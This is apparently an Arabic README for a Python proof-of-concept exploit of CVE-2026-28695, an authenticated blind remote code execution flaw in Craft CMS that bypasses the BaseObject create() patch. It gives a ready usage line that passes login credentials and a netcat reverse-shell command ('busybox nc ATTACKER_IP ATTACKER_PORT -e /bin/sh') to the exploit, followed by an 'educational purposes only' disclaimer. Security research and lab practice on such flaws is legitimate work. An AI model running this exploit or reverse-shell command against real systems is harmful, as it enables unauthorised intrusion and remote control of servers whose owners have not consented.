
استغلال Python PoC لـ CVE-2026-28695، وهو RCE أعمى مُصادَق عليه في Craft CMS يتجاوز تصحيح create() الخاص بـ BaseObject ويُنشئ reverse shell.
تنفيذ تعليمات برمجية عن بُعد بشكل أعمى بعد المصادقة في Craft CMS. يتجاوز قيد create() - BaseObject المُضاف في إصلاح CVE-2026-28695 (commit e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
هذا السكربت مخصص للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. تأكد دائمًا من حصولك على الإذن قبل اختبار أو استغلال الثغرات!